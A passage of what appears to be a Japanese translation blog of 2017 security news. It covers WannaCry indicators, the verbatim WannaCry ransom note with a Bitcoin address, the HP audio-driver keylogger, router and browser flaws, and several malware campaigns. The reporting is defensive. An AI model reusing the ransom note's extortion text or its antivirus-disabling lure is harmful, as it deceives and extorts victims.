    [Installed_Folder]\TaskData\Tor\ssleay32.dll
    [Installed_Folder]\TaskData\Tor\taskhsvc.exe
    [Installed_Folder]\TaskData\Tor\tor.exe
    [Installed_Folder]\TaskData\Tor\zlib1.dll
    [Installed_Folder]\taskdl.exe
    [Installed_Folder]\taskse.exe
    [Installed_Folder]\u.wnry
    [Installed_Folder]\wcry.exe

    Wana Decrypt0r / WannaCrypt0r関連レジストリ エントリ
    HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random]      "[Installed_Folder]\tasksche.exe"
    HKCU\Software\WannaCrypt0r\
    HKCU\Software\WannaCrypt0r\wd      [Installed_Folder]
    HKCU\Control Panel\Desktop\Wallpaper      "[Installed_Folder]\Desktop\@WanaDecryptor@.bmp"

    Wana Decrypt0r / WannaCrypt0r通信ネットワーク
    gx7ekbenv2riucmf.onion
    57g7spgrzlojinas.onion
    xxlvbrloxvriy2c5.onion
    76jdd2ir2embyv47.onion
    cwwnhwhlz52maqm7.onion
    https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

    Wana Decrypt0r / WannaCrypt0rロック画面テキスト
    What Happened to My Computer?
    Your important files are encrypted.
    Many of your documents, photos, videos, databases and other files are no longer accessible because they have been encrypted. Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.

    Can I Recover My Files?
    Sure. We guarantee that you can recover all your files safely and easily. But you have not so enough time.
    You can decrypt some of your files for free. Try now by clicking .
    But if you want to decrypt all your files, you need to pay.
    You only have 3 days to submit the payment. After that the price will be doubled.
    Also, if you don't pay in 7 days, you won't be able to recover your files forever.
    We will have free events for users who are so poor that they couldn't pay in 6 months.

    How Do I Pay?
    Payment is accepted in Bitcoin only. For more information, click .
    Please check the current price of Bitcoin and buy some bitcoins. For more information, click .
    And send the correct amount to the address specified in this window.
    After your payment, click . Best time to check: 9:00am - 11:00am GMT from Monday to Friday.
    Once the payment is checked, you can start decrypting your files immediately.

    Contact If you need our assistance, send a message by clicking .

    We strongly recommend you to not remove this software, and disable your anti-virus for a while, until you pay and the payment gets processed. If your anti-virus gets updated and removes this software automatically, it will not be able to recover your files even if you pay!

    Wana Decrypt0r / WannaCrypt0r脅迫文
    Q: What's wrong with my files?

    A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted.
    If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!
    Let's start decrypting!

    Q: What do I do?

    A: First, you need to pay service fees for the decryption.
    Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

    Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software.
    Run and follow the instructions! (You may need to disable your antivirus for a while.)

    Q: How can I trust?

    A: Don't worry about decryption.
    We will decrypt your files surely because nobody will trust us if we cheat users.

    * If you need our assistance, send a message by clicking on the decryptor window.

    暗号化されたファイルの拡張子
    .WCRY
    .WNCRY


    ヒューレットパッカード(HP)のラップトップのオーディオドライバにキーロガーが発見された
    BleepingComputer : News>Security (2017/05/11)
     HPのラップトップの一部にインストールされているオーディオドライバが、キーロガー(ユーザのキーストロークを全て記録し、その情報をローカル ファイルに保存し、何処を調べればいいのか分かっている誰もに、あるいは、サードパーティのソフトウェアや、マルウェアに、アクセスを可能にする)と言い表すのが最も適切な機能を含んでいた。
     スイスのサイバーセキュリティ企業modzeroは、4月28日に、このキーロガーを発見し、その発見を本日公開した。

    このキーロガーはプレインストールされているオーディオドライバ中に発見された

     研究者によると、このキーロガー機能は、Conexant HDオーディオドライバ パッケージのバージョン1.0.0.46及びそれ以前の中に発見される。
     これは、HPラップトップにプレインストールされているオーディオドライバである。このオーディオドライバのファイルの一つが、MicTray64.exe (C:\windows\system32\mictray64.exe)である。
     このファイルは、ユーザが自身のコンピュータにログインする度にScheduled Taskを介して起動するように登録されている。modzeroの研究者によると、このファイルは、「マイクロフォン、ミュート/ミュート解除、キー/ホットキーのような機能をキャプチャしたり相互作用したりするためにユーザによって実行された全てのキーストロークを監視している」。
     多くの他のアプリケーションが、この方法で動作しているので、この挙動は、単独では問題ないものである。この問題は、このファイルがローカル ファイル(C:\users\public\MicTray.log)に全てのキーストロークを記述することにある。

    オーディオドライバはローカルAPIを介してリアルタイムにキーストロークを露わにする

     このファイルが存在していない、あるいは、このファイルのパスを含むレジストリキーが存在していなかったり、損壊している場合、このオーディオドライバは、全てのキーストロークをローカルAPI(OutputDebugStringと名付けられているAPI)に渡す。
     この危険は、コンピュータにインストールされた悪意あるソフトウェアが、もしくは、そのコンピュータに物理的なアクセスを持つ人が、抽出し、このファイルをコピーし、今迄に使用されたキーストロークのデータから、パスワード、チャットのログ、訪問したURL、ソースコード、あらゆる他の機密データを抽出し、それにアクセスできることにある。
     更に、OutputDebugString APIは、マルウェアが、通常アンチウィルス ソフトウェアの監視下にある本来のWindows機能を使用することなく、リアルタイムにキーストロークを記録するための隠されたチャンネルを提供している。

    キーロガー機能が確認されたHPラップトップ

     modzeroの研究者は、Conexant HDオーディオドライバ パッケージが、HPの28のモデルにプレインストールされていたと発言している。このドライバを使用している他のハードウェアは、影響を受けることはないかもしれないが、調査した者は、この問題が他のコンピュータメーカーに影響を与えることを公式には確認していない。

      HP EliteBook 820 G3 Notebook PC
      HP EliteBook 828 G3 Notebook PC
      HP EliteBook 840 G3 Notebook PC
      HP EliteBook 848 G3 Notebook PC
      HP EliteBook 850 G3 Notebook PC
      HP ProBook 640 G2 Notebook PC
      HP ProBook 650 G2 Notebook PC
      HP ProBook 645 G2 Notebook PC
      HP ProBook 655 G2 Notebook PC
      HP ProBook 450 G3 Notebook PC
      HP ProBook 430 G3 Notebook PC
      HP ProBook 440 G3 Notebook PC
      HP ProBook 446 G3 Notebook PC
      HP ProBook 470 G3 Notebook PC
      HP ProBook 455 G3 Notebook PC
      HP EliteBook 725 G3 Notebook PC
      HP EliteBook 745 G3 Notebook PC
      HP EliteBook 755 G3 Notebook PC
      HP EliteBook 1030 G1 Notebook PC
      HP ZBook 15u G3 Mobile Workstation
      HP Elite x2 1012 G1 Tablet
      HP Elite x2 1012 G1 with Travel Keyboard
      HP Elite x2 1012 G1 Advanced Keyboard
      HP EliteBook Folio 1040 G3 Notebook PC
      HP ZBook 17 G3 Mobile Workstation
      HP ZBook 15 G3 Mobile Workstation
      HP ZBook Studio G3 Mobile Workstation
      HP EliteBook Folio G1 Notebook PC

     このConexant HDオーディオドライバ パッケージは、以下のオペレーティングシステム用のバージョンがある。

      Microsoft Windows 10 32-Bit
      Microsoft Windows 10 64-Bit
      Microsoft Windows 10 IOT Enterprise 32-Bit (x86)
      Microsoft Windows 10 IOT Enterprise 64-Bit (x86)
      Microsoft Windows 7 Enterprise 32 Edition
      Microsoft Windows 7 Enterprise 64 Edition
      Microsoft Windows 7 Home Basic 32 Edition
      Microsoft Windows 7 Home Basic 64 Edition
      Microsoft Windows 7 Home Premium 32 Edition
      Microsoft Windows 7 Home Premium 64 Edition
      Microsoft Windows 7 Professional 32 Edition
      Microsoft Windows 7 Professional 64 Edition
      Microsoft Windows 7 Starter 32 Edition
      Microsoft Windows 7 Ultimate 32 Edition
      Microsoft Windows 7 Ultimate 64 Edition
      Microsoft Windows Embedded Standard 7 32
      Microsoft Windows Embedded Standard 7E 32-Bit

    HPは、この記事を公開する時点でBleeping Computerからのコメントの要求に対して応答していない。

    HP MicTray64 Keyloggerをチェックし削除する方法

     modzeroによると、以下のステップに従うことで、HP MicTray64.exeキーロガーをチェックし削除することができるとしている。

      1. Task Manager(タスクマネージャ)を開き、MicTray64.exeと呼ばれるプロセスが実行中であるかを確認する。このプロセスが存在している場合には、終了させる。
      2. c:\Windows\System32\MicTray64.exe に移動し、このファイルをデスクトップに移動させる。
      3. C:\Users\Public\MicTray.log が存在しているか否かチェックする。存在している場合には、このファイルを同様にデスクトップに移動する。
      4. ここで、このキーロガーが削除され、ログファイルが隔離されたので、何がログされているのか調べなさい。
      5. デスクトップ上のMicTray.logファイルを開き、内容を検証しなさい。ログイン名、パスワード、銀行情報、あらゆる他の機密ログイン情報がログされていることに気がついたなら、関連するアカウントのパスワードを変更しなければならない。

     このステップに従ったなら、このキーロガーは最早アクティブにならないし、再起動で起動することもなくなる。


    ASUS RTワイアレスルータ所有者は、Webハイジャックのバグにパッチをあてなさい
    The Register : Security (2017/05/11)
     ASUS RTワイアレスルータが、30のデバイスに影響を与える貧弱なCross-Site Request Forgery(CSRF、クロスサイト リクエスト フォージェリ。【訳注】 別のサイトに用意したコンテンツ上の罠のリンクを踏ませること等をきっかけとして、インターネットショッピングの最終決済や退会等Webアプリケーションの重要な処理を呼び出すようユーザを誘導する攻撃(情報処理推進機構より))プロテクションにより、SOHOpelessリストに仲間入りした。
     CVE-2017-5891とラベルされたこの設計上のポカは、バージョン 3.0.0.4.380.7378 より古いファームウェアを使用している RT-AC と RT-N 製品系列に存在している。
     CSRFプロテクションの欠落は、ユーザがDefault認証(admin:admin)のままであったり、攻撃者が管理パスワードを認識していた場合に、犠牲者が悪意あるWebページを訪問した時、このWebページは、ルータにログインすることができる。この問題を発見したNightwatch Cybersecurityは、今週、この問題は些末なこと(「'login_authorization'フォーム ポストとしてBase-64でエンコードされたユーザ名とパスワードをブラウザの'/login.cgi' URLに送信している」)であると説明していた
     ログインが成功すると、例えば、攻撃者はルータの設定変更や、DNSの乗っ取りができることを意味しているが、NIghtwatchは、「我々は、一貫してこの問題を悪用することができなかった」と認めている。Nightwatchはまた、二つのJSONPバグ(ネットワークマップやルータの詳細のような極秘の可能性のある情報を露わにすることができる)にも注目している。
     ASUSは、このCSRF問題を5月のファームウェア アップデートで解決したが、Nightwatchの非CSRF問題の一つ(CVE 2017-5892。【訳注】 バージョン3.0.0.4.380.7378より古いファームウェアを搭載したASUS RT-AC* と RT-N* デバイスは、ネットワークマップのようなJSONP情報開示を可能にするバグ(Common Vulnerabilities and ExposuresのDescriptionの和訳))は、修正を必要とするほどの深刻さはないと考えているようである。また、このアップデートされたファームウェアは、以下を修正している。

      ・ CVE-2017-6547: このルータのHTTPデーモン中のクロスサイト スクリプティングのバグ
      ・ CVE-2017-6549: HTTPデーモン中のセッションハイジャックの脆弱性
      ・ CVE-2017-6548: このルータのネットワークコマンド中のリモートコード実行バッファ オーバーフロー

     未だパッチしていないのであれば、パッチしなさい。

    Update BleepingComputerが先程UPした記事に脆弱性のある型番とダウンロードサイトへのリンクが記載されていましたので、追記しておきます。

    ファームウェア ダウンロードは、コチラから。

    脆弱性のあるルータの型番は以下。

      RT-AC51U
      RT-AC52U B1
      RT-AC53
      RT-AC53U
      RT-AC55U
      RT-AC56R
      RT-AC56S
      RT-AC56U
      RT-AC66U
      RT-AC68U
      RT-AC68UF
      RT-AC66R
      RT-AC66U
      RT-AC66W
      RT-AC68W
      RT-AC68P
      RT-AC68R
      RT-AC68U
      RT-AC87R
      RT-AC87U
      RT-AC88U
      RT-AC1200
      RT-AC1750
      RT-AC1900P
      RT-AC3100
      RT-AC3200
      RT-AC5300
      RT-N11P
      RT-N12 (D1 versionのみ)
      RT-N12+
      RT-N12E
      RT-N16
      RT-N18U
      RT-N56U
      RT-N66R
      RT-N66U (B1 versionのみ)
      RT-N66W
      RT-N300
      RT-N600
      RT-4G-AC55U (パッチは利用可能になっていない)


    ニュース ブリーフ: 身代金要求型マルウェアBitKangorooは、支払いをしない場合には、ファイルを削除する
    BleepingComputer : News>Security (2017/05/08)
     私は、新たな身代金要求型マルウェアがリリースされた時に簡潔な記事を投稿する新しいことに挑戦中である。これら身代金要求型マルウェア感染の多くは、詳細な記事を必要とするものではないが、我々が身代金要求型マルウェアを発見した時、その新しいテクニックや変種に関して早急に公表することは重要なことだと思っている。
     身代金要求型マルウェアに関する最初の簡潔な記事として、私が本日発見したBitKangorooと呼ばれる新しい開発下の身代金要求型マルウェアに着目する。この特別な身代金要求型マルウェアは、犠牲者が素早く支払いをしなければ、犠牲者のファイルを削除することを意図する本当の卑劣漢によって開発されている。
     手短に言うと、この身代金要求型マルウェアは、AES-256暗号化を使用して犠牲者のファイルを暗号化し、暗号化されたファイルに .bitkangoroo 拡張子を追加する。次に、この身代金要求型マルウェアが暗号化されたファイルの一つを削除する猶予期間である60分のカウントダウンを表示する。一つのファイルが削除されると、このタイマーは60分にリセットされる。もっとも重要なことは、この身代金要求型マルウェアは、Michael GillespieBitKangarooDecrypterを使用して無料で復号することができる。
     以下にBitKangorooのロックスクリーンを示す。


    BitKangoroo身代金請求画面(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアは、現在開発下にあるので、デスクトップ上のファイルしか暗号化しない。犠牲者が間違った復号キーを入力すると、暗号化されたファイルの全てを削除する非作動コードを含んでもいる。あなたが上図の Decrypt my files ボタンをクリックした時に表示される警告メッセージは以下である。


    ファイル削除警告(復号キーは間違いないか? キーを挿入できるのは一回だけだ。間違っていれば、全てのファイルは削除される)

     以下に暗号化したファイルの全てを削除するコードを示す。


    ファイル削除用のコード

     最後に、この身代金要求型マルウェアの画面は、クリックすると、この身代金要求型マルウェアの開発者にeMailするためのフォームを開くラベルを含んでいる(【訳注】 一番上の図の一番下、Click me to write the email!)。現在使用されているeMailは、bitkangoroo@mailinator.com であり、以下に、このeMailの例を示す。


    身代金要求型マルウェア開発者へのeMail(画像をクリックすると拡大表示されます。Warning以下に注意してください。直上の文字列を削除するな、とあります。)

     この身代金要求型マルウェアの状況が変化したら、私はこの記事をアップデートする。
     あなたが、この簡潔な記事を有用であると判断したなら、私に知らせてほしい、それで、私はこのような記事を継続するか否か決定することができる。

    IOCS

    Hashes

    SHA256: 810f9bff502d2c9a98164201590eed5ff2cc96cd42a5d6008af93ecfc8bf9c13

    関連ファイル

    %UserProfile%\AppData\Roaming\IEAgent.exe

    関連eMail

    bitkangoroo@mailinator.com


    Googleの研究者が、Windows中にワームの侵入を可能にする「あまりにも酷い」脆弱性を発見した
    BleepingComputer : News>Security (2017/05/08)
    Update: (米国時間)昨晩遅く、Microsoftは、この「あまりにも酷いバグ」を修正する緊急のパッチをリリースしています。
     こちらのアドバイザリを参照して、適切に対処してください。

     Googleのセキュリティ専門家がWindows OS中に深刻なリモートコード実行(RCE)のバグを発見した。このバグは、「あまりにも酷い」ものとして説明されている。
     この二人の専門家は、Project Zero(サードパーティのソフトウェア製品中の0-Dayの脆弱性を発見し、パッチの手助けをするGoogleイニシアティブ)で活動しているNatalie SilvanovichとTavis Ormandyである。
     この二人は、この脆弱性の詳細をリリースしていないが、この問題に関連する幾許かの不可解なツイートを投稿している。
     「@natashenkaと私は、最近のメモリ中での最悪のWindowsリモートコード実行を発見したと、私は思っている」そして、「これは『あまりにも酷い』ものである。途中報告」と、土曜日(5月6日)にOrmandyは発言している。
     Twitterのインフォセック コミュニティによる追求で、Ormandyは、詳細を明らかにしている。

      - 攻撃者と犠牲者は、必ずしも同一のLANに存在している必要はない。
      - 攻撃は、DefaultのWindowsインストールで動作する。これは、犠牲者が脆弱性となる特別なソフトウェアを彼等のシステムにインストールする必要がないことを意味している。
      - 攻撃は、ワーム(自己増殖する)の侵入を可能にする

     このツイートは、2017年5月の定例パッチ(明日、5月9日に予定されている。【訳注】 日本は5月10日(水))の数日前に出現した。この研究者達は、この脆弱性は今月パッチされるかもしれないと仄めかし、そうなれば、レポートが来るだろうと、そして、彼等が彼等の発見を自由に公開するだろうと、発言している。
     過去2年間、Ormandyは世の中で最も熟達したバグハンターの一人であり、CloudFlare, LastPass, Bromium's micro-virtualization technologyのような製品中の0-Dayや未パッチの脆弱性、そしてKaspersky, ESET, FireEye, Malwarebytes, AVG, Avast, Symantec, Trend Micro, Comodoのような複数のアンチウィルス エンジン中の0-Dayや未パッチの脆弱性を発見している。


    マルウェアの制作者は検出回避を願ってジャンク データでバックドア トロイを膨らましている
    BleepingComputer : News>Security (2017/05/01)
     マルウェアのプログラマは、一部のアンチウィルスによる検出回避を願って、あるいは、情報セキュリティの専門家の調査を遅延させるために、彼の悪意あるペイロードに数メガバイトのジャンク データを挿入している。
     このマルウェアのプログラマは、"123"としてのみ知られており、彼が最初にXXMMマルウェアを配備して注目された2015年以来、積極的に活動している。彼の行為は、標的型攻撃に分類される。そして、機密データを密かに抽出する目的で日本企業のコンピュータへの感染に取り組んでいる犯罪者である。

    123マルウェア プログラマは三つのマルウェアファミリーの背後にいる

     レポートによると、プログラマ123は、少なくとも三つのマルウェアファミリー(夫々、XXMM, ShadowWali, Wali)を陰に存在している。
     セキュリティ企業は、2015年のXXMMマルウェアによる123の最初の攻撃に気付いていたが、彼等は、これを非常に効果的ではあるが洗練されていないバックドアであると見做していた。
     セキュリティ企業は、同じプログラマによって作成された二つの新しいマルウェアファミリーを発掘した後、この一ヶ月に渡って、123の挙動に対する関心を再び唆られることになった。
     セキュリティ企業が発見した一つ目は、Waliと名付けられた新しいバックドア トロイであった。これは、2016年と2017年に於けるライブ攻撃で使用されていたことが確認されている。
     Kasperskyの最初のWailレポートの2週間後、Cybereasonのセキュリティ研究者が別のバックドアを発掘した。これは、Wailと多くの機能が共有されているためにShadowWailと名付けられた。

    ShadowWailは、Wailの早期のバージョンに大変類似している

     研究者は、2015年から、Waliによる攻撃の直前である2016年の半ばにかけて、ShadowWaliで日本企業が攻撃されていたことを明らかにした。
     二つの間に大きな相違がある場合でも、専門家は、Waliが32-bitと64-bitの両方で実行される(明らかに最初のものからの進化)が、ShadowWaliは32-bitバージョンしかサポートしていないという事実によって裏付けられるとする説で、ShadowWaliがWailの早期バージョンであると確信している。
     更に、それらの手口は殆ど同じである。攻撃は、ユーザがセキュリティ侵害されているWebサイトから、このマルウェアをダウンロードした後に開始する。最初のペイロードが実行されると、一連のチェックが始まる。これに合格すると、最終的にShadowWali / Waliバックドアをダウンロードすることになる。

    ShadowWailやWaliはジャンク データで膨らまされている

     ShadowWailとWaliは共に、内部に大きなファイル(50から200MBの範囲)をパッキングしている。ShadowWailとWaliにパッキングされているデータの殆どは、なんの目的もないジャンク データである。殆どのマルウェアは通常非常に小さい(僅か数キロバイトで、メガバイト レベルのものは非常に稀)ので、これは奇妙なことである。
     セキュリティ専門家によると、123は、大きなファイルをマルウェア中にパッキングすることによって、セキュリティ製品が、正当なアプリケーションと考えたり、あるいは、パフォーマンスの理由から、絶対にこのファイルをスキャンしないという誤解を持っていると、彼等は確信している。
     研究者は、123がShadowWaliとWaliペイロードの周囲にジャンク データのロードをパッキングしている別の理由として、彼がセキュリティ企業の調査を遅延しようとしているとする説を提示している。この理由は、YARA(マルウェアを見つけ出すために使用されるセキュリティ情報専門家によって使用される特別なフィルター)ルールが、大抵の場合大きなファイルより、むしろ小さなファイルを見つけるように設定されていることにある。

    ShadowWail/Waliはパスワードをダンプするプログラムをダウンロードするために使用されている

     感染したコンピュータに、ShadowWaliもしくはWaliがインストールされると、このマルウェアは、それ自体を他のプロセスに挿入する。殆どの感染では、選択されるプロセスは、Internet Explorer(iexplorer.exe)であるが、このマルウェアは、Windows Explore(explorer.exe)や、Local Security Authority Subsystem Service(lsass.exe)に挿入されていたケースがあった。
     その後、次のステップは、現在のPCから証明書をダンプするための幾つかのツールをダウンロードし、ローカルネットワークを探検することである。ローカルユーザ証明書を取得するために、ShadowWali/Waliは、パスワード ダンピング ユーティリティMimkatzのモジュールをダウンロードしインストールする。
     次に、123は、企業ネットワークの内部を横断的に移動するために、この証明書を使用し、彼が盗むことのできる機密情報を検索する。このデータで、123が実行しようとしていることは、現時点で分かっていない。

    研究者はShadowWaliビルダーのベールを剥いだ

     Cybereasonの専門家の更なる調査は、このマルウェアをアッセンブルするために使用されたShadowWaliビルダーと思われるユーティリティを明らかにした。


    xxmm2_builder インターフェース


    xxmm2_builder - 最初のボタンのオプション


    xxmm2_builder - 二番目のボタンのオプション


    xxmm2_builder - 三番目のボタンのオプション

     "xxmm2_build"と名付けられている場合でも、このビルダーの出力は、XXMMバックドアよりもむしろ、ShadowWaliのサンプルにより一致していると、CybereasonのAssaf Dahanは発言している。
     更に、サンプルがユーザモードでのみ動作したので、このビルダー インターフェース中の用語"rootkit"の用法は、その出力と一致していない。
     このビルダーはまた、このマルウェアのC&Cサーバ コミュニケーション(JPEG画像内部の第二段階のマルウェアダウンロードを隠蔽するために電子迷彩技術に依存している)と、データを感染したホストと交換するためのPHPトンネルに対する研究者の洞察を可能にしていた。
     専門家によると、123がアジアに在住していることを指摘する証拠もまた存在しているが、正確で明瞭な特性は、現在の所作成できていない。


    SamusunスマートTVは、Wi-Fiダイレクト機能を介してハックされる
    BleepingComputer : News>Security (2017/04/26)
     Nesesoのセキュリティ研究者は、彼等がSamusunスマートTV中に発見し、Samusunが修正を拒否した脆弱性に関して警告を発している。
     このセキュリティ フローは、Wi-Fiダイレクト(ワイアレス・アクセスポイントを要求することなく、デバイスの相互接続を有効にするWi-Fi規格)に影響する。
     Samusunは、彼等のTVの所有者が、ローカル・アクセスポイントを介することなく、電話、ラップトップやタブレットを直接TVに接続することを可能にするために、彼等のスマートTVにWi-Fiダイレクトを使用している。

    SamusunスマートTVは認証にMACアドレスを使用している

     Nesesoの研究者は、Samusunが、ユーザ認証にMACアドレスを使用しているだけなので、この規格の実装は失敗していると主張している。他のベンダは、プッシュボタンやPINに基づいたより確固たる認証システムを使用している。
     誰もが、MACアドレスを傍受したり成り済ましたりすることができるので、この脆弱性が開いていると、TVのWi-Fiダイレクトの受信範囲にいる全ての者が、このユーザのTVをハックできることになる。
     「接続すると、この攻撃者は、このTVが提供する全てのサービスへのアクセス(リモートコントロール・サービスやDLNAスクリーン・ミラーリング)を持つことになる」と、Nesesoの研究者は、彼等のレポートに記述している。

    このスマートTVは他のハッキングのためのエントリーポイントとして使用可能

     更に、彼等は、攻撃者がユーザや企業のプライベートネットワークへのエントリーポイントとして、このTVへのアクセスを使用できることに異議を唱えている。攻撃者は、このTVが接続されているWi-Fiネットワーク用のログイン認証をダンプすることができ、そして、他のデバイスに移動することができる。
     殆どの企業が事務所、従業員休憩室、顧客待合室、役員室にスマートTVを設置しているので、この危険性は、企業にとっては直ぐに感じられるものである。
     最悪の事態は、SamusunスマートTVが、電源を入れる度にDefaultでWi-Fiダイレクトを有効にしていることにある。ホワイトリストに記述されているデバイスがWi-Fiダイレクトを介してこのTVに接続されると、ユーザはスクリーン上で通知されるが、このような警告は、TVの所有者に誤解されたり、誰も画面に注意を払っていなければ、完全に無視される可能性がある。

    Samusunは「セキュリティ上の脅威」ではないと発言している

     3月中旬、NesesoにコンタクトされたSamusunは、この問題を「セキュリティ上の脅威」と見なしていないとNesesoに告げ、この機能はセキュリティ上のリスクと見なしていない、そして、ファームウェアのアップデートを提供することはないと回答していた。
     研究者は、Samsung UN32J5500 ファームウェアのバージョン 1480 でこの攻撃をテストしたが、他のバージョンも似たようなものであると発言している。SamusunスマートTVの電源を入れる度に、この機能をOFFにする以外、Wi-Fiダイレクトを介しての攻撃を防御するための解決策は現在存在していない。
     今月初めのSecurity Analyst Summit 2017で、セキュリティ エキスパートAmihai Neidermanは、Tizen中に40の0-Dayの脆弱性を公開した。このTizenは、SamusunスマートTVで稼働しているオペレーティングシステムである。このフローは、彼等がレポートした時点で、全て未パッチのままである。


    Microsoft EdgeにCookieとパスワード盗難の脆弱性
    BleepingComputer : News>Security (2017/04/24)
     Microsoft Edge中の脆弱性が悪用されると、攻撃者は、ユーザの様々なオンラインアカウント用のパスワードとCookieファイルを取得することが可能になる。
     この脆弱性は、EdgeやInternet Explorerのフローを長期に渡って明るみに出してきたセキュリティ エキスパートManuel Caballeroによる研究に従って明るみに出た。
     Caballeroの最新の研究は、同一生成元ポリシー(WebサイトAがWebサイトBからロードされたスクリプトをロードし実行することを妨げるセキュリティ機能)のバイパスである。

    この脆弱性は攻撃者にEdgeのSOP(同一生成元ポリシー)防御をバイパスすることを可能にしている

     今日、Caballeroが頭痛を誘発する技術記事で公開したこのフローは、攻撃者が、データURI、meta refreshタグ、about:blankのようなドメインレス ページと協力して悪意あるコードをロードし実行することを可能にするものである。
     悪用技術の様々なバリエーションにおいて、Caballeroは、犠牲者を悪意あるURLにアクセスするように欺くことによって注目を浴びているサイトでコードを実行できる方法を示した。
     三つの概念の証明のデモで、この研究者はBingホームページでコードを実行し、他のユーザの代理としてTweetし、TwitterのアカウントからパスワードとCookieファイルを盗んだ。
     この最新の攻撃は、最先端のブラウザの設計におけるセキュリティ フロー(ユーザをログアウトしたり、ログインページをロードしたり、ブラウザのパスワード自動補完機能によって自動的に挿入されるユーザ認証を盗む攻撃者の能力のような)を再露出させた。
     この全てが動作している方法をより適切に理解するために、Caballeroは、この攻撃ビデオをレコーディングしている。
     この脆弱性は現在未パッチである。概念の証明のデモのバージョンはオンラインにホストされている[1, 2, 3]が、我々は、人々がTwitterのCookieやパスワードをサイトにダンプされるのは恐怖であると推測する。
     このために、Caballeroはダウンロード用のデモを提供しているので、他の人はソースコードを調査し、彼等のパスワードやCookieが何処にもアップロードされていないことを確認することができる。

    悪意ある広告は攻撃を自動化することができる

     このセキュリティ研究者は、攻撃者が他のオンラインサービス(Facebook、Amazon等)のパスワードやCookieをダンプさせるようにカスタマイズすることができると発言している。このフローは、UXSS/SOPバイパスが、何方かといえば各ブラウザ固有であるために、Edgeだけが影響を受ける。
     更に、最先端の広告はブラウザにJavaScriptコードを配布する。攻撃者は、数千以上の犠牲者にこの悪意あるコードの配布を自動化するために、悪意ある広告キャンペーンを利用することができる。
     「攻撃者は人気のサイトの安直なバナーの内部に悪意あるビットを仕込んだ悪意ある広告を使用すると考えなさい。攻撃者がYahooのバナーの内部にホストされ、このユーザが彼女のTwitterアカウントにログインするとしたら、彼女は、対話的な行為を何ら行うこともなく専有されるだろう(原文のまま)」と、この研究者は説明している。

    Webrootアンチウィルスが発狂した! Windowsのシステムファイルを悪意あるものとして判定している
    BleepingComputer : News>Security (2017/04/25)
     Webrootアンチウィルスが昨日の午後遅く発狂した。Windowsのシステムファイルを悪意あるものとして判定したので、影響を受けたファイルの一部は隔離所に移動させられ、顧客のコンピュータを滅茶苦茶にし始めていた。
     アンチウィルス ソフトウェアは、Windowsシステムファイルを無視するように設計されている。これは、これらのファイルが、Windows OSの操作に極めて重要なもののためである。
     Webrootは、これらのファイルを、トロイ(W32.Trojan.Gen)として判別したが、これは最大の問題ではなかった。このアンチウィルスは、ファイルの移動を始めたので、コンピュータはエラーを表示したり、一部のコンピュータはクラッシュした。
     この会社は、彼等のアンチウィルスが、米国山岳部時間(MST)午後1時から午後3時(協定世界時 午後7時から午後9時、【訳注】 日本時間、翌日の午前4時から午前6時)の間、メチャメチャになったと発言している。この問題は、最終的に修正されたが、多くの顧客が、数百もしくは数千のファイルの隔離所への移動を押し付けられた。

    WebrootはFacebookへのトラフィックもブロックした

     殆ど同時に、Webrootアンチウィルスは、Facebookをフィッシングサイトとしてタグ打ちし、このソーシャルネットワークへのアクセスをブロックした。
     このアンチウィルスは、ユーザが彼等の不満を示すためにTwitterを使用し、この会社を激しく非難していたので、Twitterもブロックしなければならなかった。
     皮肉の頂点で、彼等の顧客広報は、Webrootの隔離所に閉じ込められたWindowsファイルの問題を持った顧客に、身代金要求型マルウェアに関するプレゼンテーションへのリンクで回答し始めた。

    現在、殆どの問題は修正された

     それであるにも拘わらず、この企業のフォーラムへの投稿によると、Webrootのテクニカル チームは素早く動き、昨晩遅くにFacebook問題を解決する修正をリリースした。
     この会社は、顧客がファイルの復元と、このアンチウィルスが同じWindowsファイルを W32.Trojan.Gen として再検出することを妨げるために従うことのできる一連の指示を提供している。
     これらの指示は、Home Editionのユーザのみに有用である。Webrootは、より複雑な修正を必要とする企業ユーザ用の解決策は、依然として作業中である。
     二ヶ月前、Webrootのアップデートは、彼等のクライアントの一部のコンピュータに問題を発生させクラッシュさせている。

     【訳注】 原文は、この後Twitterの引用が続きますが、公開された画像のみ紹介し、それ以外は省略します。


    PDF中に隠されていたWordドキュメントに身代金要求型マルウェアが隠れていた
    Sophos : NakedSecurity (2017/04/24)
     SophosLabsは、ロシアのマトリョーシカ人形のように、順番にPDFに入れ子にされていたWordドキュメント内部のマクロによって、身代金要求型マルウェアをダウンロードし実行する新たなスパム キャンペーンを発見した。今回の身代金要求型マルウェアは、 Lockyの変種であるように思われる。
     SophosLabsの研究者によると、殆どのアンチウィルスのフィルターは、ドキュメント中の疑わしいマクロを認識する術を知っているが、PDF内部に隠されたこのようなドキュメントは、このフィルターを上手く躱す術になりそうである。

    最新の戦術はどのようなものなのか?

     一般的なパターンに従うと、この最新の身代金要求型マルウェアは、PDF添付ファイルの付いたeMailスパムとして出現する。

    このPDFは、内部にドキュメントが付属しており、Acrobat Readerで開かれようとする。

     このドキュメントがMS Word中に開かれると、ソーシャル・エンジニアリング攻撃を通して編集を有効にするように要求してくる。

    これは、Crypto身代金要求型マルウェアをダウンロードし実行するVBAマクロを実行する

    何をすべきか?

     この種の攻撃からより適切に身を守るために人々が実行できることがある。

      ・ 定期的にバックアップし、最新のバックアップをオフサイト(【訳注】 PC本体やインターネットに接続していない場所)に保持しなさい: ファイルが突然消滅するのは身代金要求型マルウェア以外にも多くの方法がある(火事、洪水、ラップトップを落とした、誤って削除した)。バックアップを暗号化しなさい。これで、バックアップ デバイスが悪者の手に渡っても何の心配もする必要はない。
      ・ eMailを介して受け取ったドキュメント添付ファイル中のマクロを有効にするな: Microsoftは、数年前からセキュリティ基準として、慎重にDefaultでマクロの自動実行をOFFにしている。多くのマルウェア感染は、あなたを説得し、あなたがマクロをONに戻すことを当てにしているので、これを実行してはならない。
      ・ 頼みもしないのに送ってきた添付ファイルには注意を払う: 間違いなくあなたが望んでいるドキュメントであると分かるまで、そのドキュメントを開くべきではないが、開けてみなければ望んでいるドキュメントか否か分からないというジレンマを、犯罪者は当てにしている。疑わしきは、無視せよ。
